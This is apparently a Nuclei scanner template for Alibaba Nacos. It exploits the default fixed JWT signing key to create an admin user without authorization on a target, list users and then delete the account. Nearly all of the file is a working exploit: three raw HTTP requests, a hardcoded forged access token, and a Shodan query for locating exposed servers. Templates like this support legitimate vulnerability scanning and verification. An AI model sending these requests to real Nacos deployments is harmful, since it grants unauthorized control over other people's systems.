id: nacos-create-user

info:
  name: Alibaba Nacos - Unauthorized Account Creation
  author: SleepingBag945
  severity: high
  description: |
    Nacos uses a fixed JWT token key to authenticate users in the default configuration. Since Nacos is an open source project, the key is publicly known, so unauthorized attackers can use this fixed key to forge any user identity Log in to Nacos to manage and operate background interface functions.
  reference:
    - https://github.com/zan8in/afrog/blob/main/v2/pocs/afrog-pocs/vulnerability/nacos-token-create-user.yaml
  metadata:
    verified: true
    max-request: 3
    shodan-query: title:"Nacos"
  tags: misconfig,nacos,unauth,bypass,instrusive

http:
  - raw:
      - |
        POST /nacos/v1/auth/users/?username={{randstr_1}}&password={{randstr_2}}&accessToken={{token}} HTTP/1.1
        Host: {{Hostname}}
      - |
        GET /nacos/v1/auth/users?pageNo=1&pageSize=9&search=blur&accessToken={{token}} HTTP/1.1
        Host: {{Hostname}}
      - |
        DELETE /nacos/v1/auth/users/?username={{randstr_1}}&accessToken={{token}} HTTP/1.1
        Host: {{Hostname}}

    payloads:
      token:
        - eyJhbGciOiJIUzI1NiJ9.eyJzdWIiOiJuYWNvcyIsImV4cCI6MTY5ODg5NDcyN30.feetKmWoPnMkAebjkNnyuKo6c21_hzTgu0dfNqbdpZQ
    attack: pitchfork

    matchers-condition: and
    matchers:
      - type: dsl
        dsl:
          - "status_code_1 == 200 && contains(body_1,'create user ok!')"
          - "status_code_3 == 200 && contains(body_3,'delete user ok!')"
        condition: and
# digest: 4a0a00473045022010f9ace78faa4086f5fe639b25b96307833ce21a84afa4592bd970e37168d6cb0221009c05e9cf9de63c5bc15036356db9ec547aaba725c4397daf4ab46c985341d5ec:922c64590222798bb761d5b6d8e72950